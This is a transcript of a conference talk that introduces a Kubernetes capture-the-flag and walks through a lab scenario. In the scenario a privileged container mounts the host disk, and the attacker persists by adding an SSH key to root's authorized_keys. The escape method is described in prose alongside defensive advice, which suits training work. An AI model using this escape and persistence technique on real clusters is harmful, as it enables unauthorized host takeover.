 Hi, everyone. How's everyone doing? Has anyone been able to get a taxi this morning? Yeah, you've got the taxi. An hour. All right. So for today's CTF, there's been a number of issues getting here. And now we're trying to spin up 100 or so clusters on conference Wi-Fi. James is, I think, somewhere in the room. There's James waving now. I'll speak more about James in a moment. But thank you for having me. And it's so lovely to see everyone again in real life, especially you, Tiffany. And now I've got the stage. I just wanted to bring up and raise up mental health. I suffer from depression. I know I'm not the only one who does. And the last couple of years, I understand we're going to hear a lot about it. But equally, just be aware of today as well. There's a bit of like seeing so many people standing up on stage. Like, I remember when I went to my first conference and I was sat in the room and it felt like, right, I'm the imposter here. I don't have a clue what anyone's talking about. We're here to learn. And so please just remember that. Or just drink water, take a breath if you need. I'll be the one who's wearing a lanyard and a mask. But if you need anyone to speak to you, just come find me and we can have a chat. So it's you might have realized that these slides what might have been made on transit here. There's a couple of us control playing here today, but I just wanted to do some honorable mentions. First of all, myself, because I'm going to honorably mention myself. If you wanted to get in touch, there's me, DM's open, I'll be here all week. James, who can you do that? There's James. So James is the mastermind behind the majority of the CTF. He is absolutely phenomenal. So it's definitely someone you need to check out. And finally, does anyone know who Andrew Martin is? OK, we've got a couple of hands. All right. If you see Andrew, please tell me where he is, because that would be really useful right now. But Andy, he's the CEO of control playing. He was my inspiration. I he gave a talk about five years ago where he did life hacking on stage. And I was like, that is not going to swear. That's the stuff I would like to be able to do. So that's why I'm here today. So previously in life. I was a software developer for a while. And well, before that, before I was a software developer, I was a kid. I think we've all been kids. And I really enjoyed solving problems whether it be a jigsaw, whether it be whatever. I don't know why I went jigsaw, but computer games and such. I loved just solving problems. And that's what led me into computers. Back in 1999, I didn't understand what Kubernetes is, and I kind of don't really understand what it is now. But that's why we're here. But it was this problem solving which led me to my job, which is also a hobby. But I was an application developer and I was a developer because security scared the hell out of me. I like clearly defined boundaries. I like to say that I've done a good job here. I like that. Security, for me, was like, well, I've secured. Is it secure? I don't know. But then that realization with age came that, actually, it's just another problem for me to solve. So that's why I'm here today. So, hands up time. Who's here at this conference? Yes, I'm making, come on, come on. Thank you, thank you. All right, whoever went to a LAN party? All right, now everyone's got their hands up, see? So like, for me, LAN parties were quake, counter-strike, halo, any other honorable mentions that you'd like to shout out now? Unreal Tournament, thank you for, oh, yes, dude, how you doing? Hey, guys, yeah, great show. But for me, it was about that community aspect. It's not just playing the game. Like, I remember us taking all our cables to this house. Like, someone rented a flat. We were like, whoa, you've rented a flat. And then we went into the air flat. So many TV, oh, it was a mess. But it was so much fun. And then that was like our original meetup. That's where we had so much pizza. So much, like, that's where we first found beer. Like, it was phenomenal. And that's where we come to today. So again, just back to problem solving there. That's what I see as CTFs. Like, CTFs, CTFs for me, even though it's capture flag. Let me go to the next slide, because, again, transit apologies. A CTF, capture flag, the purpose of this is to find a flag. And that's an upset objective. That's clearly defining our boundaries. We know we're going into a cluster and we need to find this flag. Now, equally, when I first did my CTF, I've never done a CTF before. I don't know what I'm doing. I feel like imposter syndrome kicking in. Like, I shouldn't be here. I don't have a clue. Now, that's what we're gonna do today. So we're gonna give you access to a CTF. Anyone done CTFs before, first of all, before I'm teaching you all how to suck eggs, which is something from the UK, which doesn't make any sense to anyone outside of the UK. Please do not suck any eggs. So, with a CTF, it gives us this learning objective. It allows us to perform the role of red team as an attacker. It allows us to do that fun thing. It allows us to be like Mr. Robot for a moment. And it's like, yes, we've taken over the world. But the importance of it is it's actually doing it. And for me, I learned best by doing. I really wish I could read a book and be able to take it straight like that. But for me, I need to do it. I need to break things. That's naturally who I am. So that's what we're doing with a CTF. So like I said, I know nothing. If you don't know anything, raise your hand, come and find us. If you're in the event, like you are here, we're just on the tables to the left over there or to the right, left, right, hard. If you're virtual online, we're also on a Slack channel. And we'll show you the Slack channel in a moment. You'll find us, and I'll mention that in a moment. But just remember, we're here to learn. There are no stupid questions. So, yes, there isn't any stupid questions. But the one thing that I'll say is there are stupid assumptions. You are stupid if you assume that. I'm going to remember you asking me what you think is a stupid question when, to me, it's an actual normal question, which I'm asked a lot of the time. So if you ever feel like this is too much for me, just come to me, like honestly, I can't remember what my last slide was. That's how terrible my memory is right now. And what we're looking for is this feeling of a LAN party that we've been to. So today, James and I and a couple of other CPUs, we're going to run through last year's CTF. Did anyone attend last year's CTF online? Did anyone get some clusters? Lovely to meet you all. There's a number of people who haven't. So if you haven't played that, we're going to play through one of the scenarios in a moment. But what we're going to do is that today, we're going to help, we're going to do some training. We're going to show you how we're going to attack these things and see how we can do these things. So that leads us on to tomorrow. So tomorrow, you're going to try harder. Now, if it's the first time you've heard try harder, don't be, I'm not being rude. It's just saying, like, this is us. It's like, if you go to the gym, if you've taken all that effort to go to the gym and then you just do like a little sesh, that's not going to give you any gains. You can see I don't really go to the gym that much. The thing here is, is that we're in this area where it's like, we're going to try to enable, we're trying to help you get to that next level. That's what we're trying to do here. And so tomorrow, we're not going to give any hints or tips. We're going to have CTFD running, which means that when you find a flag, you can submit it. And what do flags make? Thank you, prizes. Thank you to the only person from the UK. And so with that, we'll have a leaderboard. And then, again, that's just for us to have some fun tomorrow. Now, we're basing this, our whole system is based on this simulator. Please feel free to take a photo, come and ask us. We can point you towards this repo. We've had it for a while now. And in all honesty, as with many open source projects, it needs a bit more love at times. And there's lots of you here. If you enjoy what you're going to be doing today, this is what you can take home to run this yourself. This is how you can run it and pay for your own cloud bills. And, but what we're doing today is that we've got something else. So we've built on top of this. It's scaling it at high numbers. There's some other technology that we're here to talk about that does something similar. So we've created this little secret source that allows us to spin up. I'm hoping we're around like 60, 70 clusters now, James, but I can see his head's deep in a laptop. So there's a thumbs up. So for us, we've never been in this position before. So Taskmaster. Again, for the one person from the UK, if you've seen the TV show Taskmaster, that's where this idea came from. During COVID, we created an identity because who doesn't make their own identity a market? And so the Taskmaster is there to support you. So if you want to access a cluster, if you DM the Taskmaster, the Taskmaster will send you a cluster. Now, this is at risk of de-dusting ourselves right now. So if all of you ask for a cluster, it's not going to be too much fun. And James' thumb up will go to a thumb down quite quickly. So please be patient with us. We're trying our best, but we will get you clusters. If you really want to play about, we'll get you sorted. Oh, yeah. And we'll do this in a demo now. The way that we provide you credentials to this cluster, we do this the most secure way that we know how, and it's by providing SSH credentials over Slack. I don't know if anyone's done that in this room, but that's how we're going to do it today and tomorrow. Thank you. Right, so it's time for a demo. My timing is all out of sync, so let's see how far we can go. At this point, I am now going to just share my screen. Okay, that same demo, great stuff. Right, I'm going to try and refresh this. So my internet connection has been a bit temperamental. Ah, there we go. Cool. I've gone to the CNCF Slack. Hopefully some of you can see that. What's that? I walked into this room and I realized I didn't clear my history of what we previously talked about on the CNCF Slack, which was mainly panic, so I've just covered it up there. So if you go to the cloud native Slack channel, you can find it everywhere on the interwebs. You'll find the Taskmaster, CTF Taskmaster from Control Blane. All we need to do is, and hopefully the Taskmaster James is on the other side, so I'm going to say, hey Taskmaster, aka James, may I please have a cluster? Okay. So it's not like we're all just waiting for this one person in the room just to say thank you, James. All right, I'm going to download this because I'm going to trust this and congratulations. We're using conference Wi-Fi. That deserves a clap. We've done something. Thank you. So, oh, actually at the back, this might be a bit small for you. Hopefully you can see. So I've got my incase of emergency and Slack didn't work just then. I've now got my credentials there. Oh, I got a tar bundle. So I'm going to run tar, XF, CubeZoom. Now, if I do an LS, that gives me the files that I need to SSH on. Again, if this is all like brand new to you, if you don't know what SSH means, honestly, I don't care that you don't know it. I will more than happily help you get over this part. So come find me. We can chat. So now that I have my credentials, I'm just going to share all of my history apparently and find this command to SSH onto bastion. So I just need to accept that. So yes, I'm going to trust. I'm on stage. Why wouldn't I come on conference Wi-Fi? Yes. So does anyone remember the first scenario from last year? Please be quiet then. So I will read this out for a moment. We are a defensively-minded organization. We followed our container-y best practices, but we've got a problem. It's hard to say where it's coming from. We've discarded our build layers in a multi-stage build, scanned for known CVEs, and we're confident the container file systems are correct. But somehow our arch nemesis, the dreaded, the dreaded pirate captain hashtag has broken out onto the host. Inconceivable, eclamity, and if anyone can say that word, I will get you a drink. Follow the captain and prove out his attack path to find the flag. You will start in a hash jack pod in a phase one blue team namespace. Okay, so there's a lot of information there. Again, if any of you have dealt with control plane, you'll probably know that we use lots of words at times. Now, it gave us some clues as to what we're looking for. Now, has anyone read the book Hacking Kubernetes? Yeah, cool. Thank you, thank you, thank you. If you haven't read the book, it's available in places. I don't know, we'll probably be on our booth, come find us, and then you can, yes, you can find a bit. But hashtag is our arch nemesis in the book as well. We created a mock company for us to base this on, and so this is where dreaded hashtag made his debut last year at KubeCon.eu. So I've done an LS just to see what I've got here, and so it just looks like I'm inside a pod. The reason I think I'm on a pod is this because in the top left here, I can see that I'm on hashtag hyphen 5D4 hyphen 4D5. So that to me suggests I'm within a pod that's managed by, it could be a deployment in this instance. Anyone wanna shout out anything that I could do? If you've already done this one, don't give the answer straight away. This is, it's pair hacking. I'll take lead, okay, cool. So I might just wanna have a look around so I could check the environment variables. I can see that we're on a Kubernetes cluster. Incidentally, this is running on a real cluster. This isn't any other magic. This isn't us trying to just like put this facade words in front of you. This is an actual cluster running on one of the cloud providers, and then you've got full access to these nodes. Incidentally, the VMs are your own when we spin up these. So the environment variables doesn't give too much. I could have like a processes. I could, if I could type. The nerves, the nerves. Cool. I guess I can just see that we're doing sleep infinity, which I plan to do by about this time next week. So, how am I doing on time? Okay, let's, I think I might finish a little bit early but then we can all get refreshments. So, the one useful thing here would probably be to see what we have mounted in. So we can see we've got a service account available there. That might be of interest in other scenarios that if you wanna play about today, then I'd look there. But the one here that I'm really of interest is mount. So, if I run mount, I start to see that there are some things mounted in here that are of interest to me. The one that I have of interest is devxvda1. So that instantly can start to identify where I might be running this VM. But it also gives me a point of attack. And remember, when you are doing this CTF, if you want to just check again, just disconnect, reconnect, see this message. If I've lost my connection now after doing that, I'm gonna be fuming. And we can read this again. So the point what we're trying to find here is, we're trying to find out what hashtag did to persist, to prove out the attack path that hashtag took, and then we're gonna look for some persistence as to what they did next. So we looked at mount and then we found that we had xvda1. Now again, just to say, because if you're new to Linux, if this is your first coupon, again, please come find us. I remember mine fondly and I was intimidated, but it's all about dropping a letter. So I'm more than happy to help you up to this point. Within Linux file system, when we mount something, we're mounting data onto it. So the way that I like to think of it is just like a USB stick. If you're running Windows or MacOS, you just connect that memory stick in, and then it's in your file system, you can access it. On Linux, we need to use mount. It's a little bit different. So what I can do is actually, let me just prepare this a little bit better. So if we check on list mount, we can see that there's nothing in there at the moment. But now if we mount dev xvda1 into mount, and then we'll just replay that command that we had a moment ago. And now we've mounted this disk onto our container. And now we can see it within there. So hopefully that brings it to there if you're brand new to this. But this is interesting. This looks like a file system that is similar to our container, but there's a little bit more in there. So this is probably the tag path at hashtag took to persist a connection. So let's just change to mount because that usually confuses me at this point. So now we're mounted into another file system. So how am I gonna attack a persist a connection? I realized I'm a little bit quick on my timing so that's why I'm holding for effect. So what the amount of done is SSH. So I'm gonna assume that this is a virtual machine and there's other things that I could do to start identifying a virtual machine. If you wanna do those things, again, give us a shout, we'll give you scenarios, you can play about this yourself and find other flags. But I'm just going straight for a kill here. So I'm gonna just check what the root user has, but I'm not gonna find it with just a less. So if I check root, so I can see that we got an SSH directory there. So let's move into root and go to dot SSH. Instantly, if it starts with a dot, then it's just a hidden directory or a hidden file. So now if we have a look here, we can see our authorized keys. And so if I cut out our authorized keys, we can see all the keys that we can use to access this. Then at the bottom, we can see just here, let's bring up a little bit. Pirate call note itself, don't misplace this flag, your CC, hashtag, PS, and then here's our flag. So this is our introduction yesterday, and I'll explain a bit what's happened here now in a moment, but what you would do tomorrow is when you find a flag like this, you'd go to CTFD, which we'll give you a link to. You submit this flag and then you get points. This is the whole purpose of a capture of flag. Now we're showing you this attack path, we're showing you what's happened here, but we haven't really described what it was. Does anyone know what happened there, why we were able to access that? Now if you did it last year, you're more than welcome to shout out. Definitely silence. So that was a privileged container. And so, and does anyone know privileged containers in here, or are we all absolutely dead? Okay, we got a couple, okay, sweet. So a privileged container, why might you use the privileged container? So containers, we use it to isolate our workloads, and in isolation using Linux namespaces and C groups, that isolation means that we're not really, like we don't have access outside of that because that's what we want, we want this boundary. Now, if you're running a workload that's dependent on something on the machine, then you need to look at the capabilities that are available within that container. Now if you go onto one of those favorite websites, so I can take you from your favorite search engine to say that this bug is happening, someone might suggest you to run a privileged container. The only problem is running a privileged container essentially means that you're running as root on that virtual machine. And so that's what happened for us. This container within this pod was being run as a privileged, and running as privileged, which meant that we had access to the XVDA1, which was the file system on the virtual machine, and then when we moved across into that, we were able to act as root on that machine. Cool. And so then we had to look, and then the hashtag in this instance, instead of having to do this attack path to get into this container to then break out of it, by adding the public key into the authorized keys, then they were able to access each onto the node. At this moment in time, it's pretty much game over for this node. This isn't ideal whatsoever. So that's what it's taught us. Points to mention, there's a number of us from Control Plane, who are giving talks over this week, everything from operators to threat modeling to anything else. So please come find us. You'll find we've got like these T-shirts with Control Plane written on them. How would you mitigate against this kind of attack, incidentally? Run a privileged container. You shouldn't be running a privileged container if you are. Don't worry if you are, incidentally. We run this quite often with our training, and I've been in training before where someone's had to run quite quickly because it was in production. So don't worry, but look at the capabilities. Instead of giving focus on least privilege, you want to not give like everything with a privileged flag, just look at what it needs to enable. Equally defense in depth, I'm probably talking, well, sorry, defense in depth, yes. So if we threat model of this and then we don't want to run a privileged container for our web public for runtimes, we don't want to run a privileged container anyway. We can have defense in depth. Okay, it's at 20 past. I'm pretty much sure I am done on everything else. Thank you for your time. If you do have any questions, then I'm more than happy to take them now. If you'd rather just start hacking away, then please DM the taskmaster. We will get you a cluster as soon as possible. Was this of interest to anyone, or am I just going to fear this, can I? Oh, hello, hello. So thank you ever so much. If you want to find us, we'll just be on the tables out there. But I hope you enjoy your KubeCon. Don't be a stranger and I'm hoping to see you soon.